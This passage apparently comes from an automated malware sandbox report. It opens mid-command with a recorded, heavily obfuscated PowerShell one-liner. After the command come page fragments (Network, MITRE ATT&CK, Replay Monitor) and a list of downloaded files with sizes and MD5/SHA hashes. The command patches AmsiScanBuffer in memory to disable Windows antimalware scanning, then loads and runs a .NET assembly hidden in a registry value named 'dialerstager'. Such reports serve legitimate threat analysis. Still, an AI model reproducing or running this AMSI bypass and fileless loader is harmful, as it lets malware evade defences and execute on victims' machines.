Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+'ct'+[Char](101)+''+'d'+'D'+[Char](101)+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+'M'+[Char](101)+'m'+[Char](111)+'ry'+'M'+''+'o'+'d'+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'e'+''+'a'+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+'A'+'n'+'s'+[Char](105)+''+[Char](67)+'las'+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'to'+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$MCdXXgRFQAU.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+'i'+''+[Char](97)+'lNa'+'m'+'e'+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'yS'+'i'+''+[Char](103)+',P'+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$XrFhyxGLyheZPe).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+'i'+''+'m'+''+'e'+',Ma'+'n'+'a'+[Char](103)+''+[Char](101)+'d');$MCdXXgRFQAU.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'','P'+[Char](117)+'bl'+'i'+'c,'+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+'S'+''+'i'+''+'g'+',N'+'e'+''+[Char](119)+''+'S'+''+'l'+''+[Char](111)+''+'t'+''+','+'Vi'+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$SlFMXGvVjc,$XrFhyxGLyheZPe).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+'m'+''+'e'+''+[Char](44)+''+'M'+''+[Char](97)+'n'+'a'+''+[Char](103)+''+'e'+''+'d'+'');Write-Output $MCdXXgRFQAU.CreateType();}$dwSXTlNXqZaok=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+'t'+[Char](101)+''+[Char](109)+''+'.'+''+[Char](100)+'l'+'l'+'')}).GetType('Mi'+[Char](99)+''+[Char](114)+'o'+'s'+''+'o'+''+'f'+''+[Char](116)+'.'+'W'+''+'i'+''+[Char](110)+''+[Char](51)+'2.U'+'n'+'s'+[Char](97)+''+[Char](102)+''+[Char](101)+'d'+'w'+'SX'+'T'+''+[Char](108)+'N'+[Char](88)+''+[Char](113)+''+[Char](90)+''+[Char](97)+''+[Char](111)+''+'k'+'');$ySBYJbHQCUudbF=$dwSXTlNXqZaok.GetMethod('y'+[Char](83)+''+[Char](66)+''+[Char](89)+''+[Char](74)+'bH'+[Char](81)+''+[Char](67)+''+[Char](85)+'u'+[Char](100)+''+'b'+''+[Char](70)+'',[Reflection.BindingFlags]''+'P'+'u'+[Char](98)+''+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+'t'+[Char](105)+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$FrOWPGrBtwDGmFgqTJc=UvslYTqssbKO @([String])([IntPtr]);$makivdWqryhSBhkIDTOiqv=UvslYTqssbKO @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$NxPOSbaDUkt=$dwSXTlNXqZaok.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'M'+[Char](111)+''+'d'+''+'u'+''+[Char](108)+''+'e'+'Ha'+'n'+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'ne'+'l'+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](100)+'l'+'l'+'')));$wsyAsJcoJsYyWN=$ySBYJbHQCUudbF.Invoke($Null,@([Object]$NxPOSbaDUkt,[Object](''+'L'+''+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+'ar'+[Char](121)+''+'A'+'')));$DUfRcMSvWYyguVPAH=$ySBYJbHQCUudbF.Invoke($Null,@([Object]$NxPOSbaDUkt,[Object]('V'+'i'+'r'+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+'o'+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$iLuACYj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wsyAsJcoJsYyWN,$FrOWPGrBtwDGmFgqTJc).Invoke(''+[Char](97)+''+[Char](109)+'si.dl'+[Char](108)+'');$awxRzvMqGhvMTtguO=$ySBYJbHQCUudbF.Invoke($Null,@([Object]$iLuACYj,[Object]('Amsi'+[Char](83)+''+'c'+''+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+'f'+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$uMgdbrgdAx=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DUfRcMSvWYyguVPAH,$makivdWqryhSBhkIDTOiqv).Invoke($awxRzvMqGhvMTtguO,[uint32]8,4,[ref]$uMgdbrgdAx);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$awxRzvMqGhvMTtguO,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DUfRcMSvWYyguVPAH,$makivdWqryhSBhkIDTOiqv).Invoke($awxRzvMqGhvMTtguO,[uint32]8,0x20,[ref]$uMgdbrgdAx);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+'TWA'+[Char](82)+'E').GetValue(''+'d'+''+[Char](105)+''+'a'+'lers'+'t'+''+'a'+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)1⤵PID:1152
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
Filesize
53KB
MD5124edf3ad57549a6e475f3bc4e6cfe51
SHA180f5187eeebb4a304e9caa0ce66fcd78c113d634
SHA256638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675
SHA512b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee
-
Filesize
19KB
MD515cd47869c7f2971045f187fcf4b74d3
SHA1bec14eb6fab22fb4c0510778f99f51e5ffa0c290
SHA25690f46b2359b7e373b63211487b2b9d694adec7410786822d239bf027736fd5a5
SHA512e9c3f20a65ae206277c8a1dcb9e8854845d53ad0f5dda1f077918a2384a2ded8ae510105cad2e6dabc14e6c0b9233e60b8b8f518749c651924a9aec1965e1a3c
-
Filesize
1KB
MD5c697637a9b17f577fccd7e83a5495810
SHA104e6054584786b88994b0e0a871562227fe2a435
SHA25654992c76969f661b605042ebdc73912dbc42e3f88aa6ffecb7191a598fc17164
SHA51266f85a03889786d2c910880bf32e9ea380740b665f11828d06acb03b6f63fb11be1d70e67acb3bc2118f2c35824919458ce7c85f6843c72a3e5ca44fadc0b3c0
-
Filesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
Filesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
674KB
MD5e479ecb1802253a4c94767c8af306baf
SHA1846bb5d88b91b8aa17bdb58eaf246b10e6586402
SHA256b9bfdd7d9a090da9ceaf2d4df414e8fd212a048692b5d90cec81d4e1b1918679
SHA512b42458e3c4b0d8833092323e2f8e2afac015822ac8a7cffbc41c930d61f32b77a6d37bb3b480a5aa538090fe2492dd124732280b4fa0a0c0f2c8cfe9d2d52373
-
Filesize
674KB
MD5e479ecb1802253a4c94767c8af306baf
SHA1846bb5d88b91b8aa17bdb58eaf246b10e6586402
SHA256b9bfdd7d9a090da9ceaf2d4df414e8fd212a048692b5d90cec81d4e1b1918679
SHA512b42458e3c4b0d8833092323e2f8e2afac015822ac8a7cffbc41c930d61f32b77a6d37bb3b480a5aa538090fe2492dd124732280b4fa0a0c0f2c8cfe9d2d52373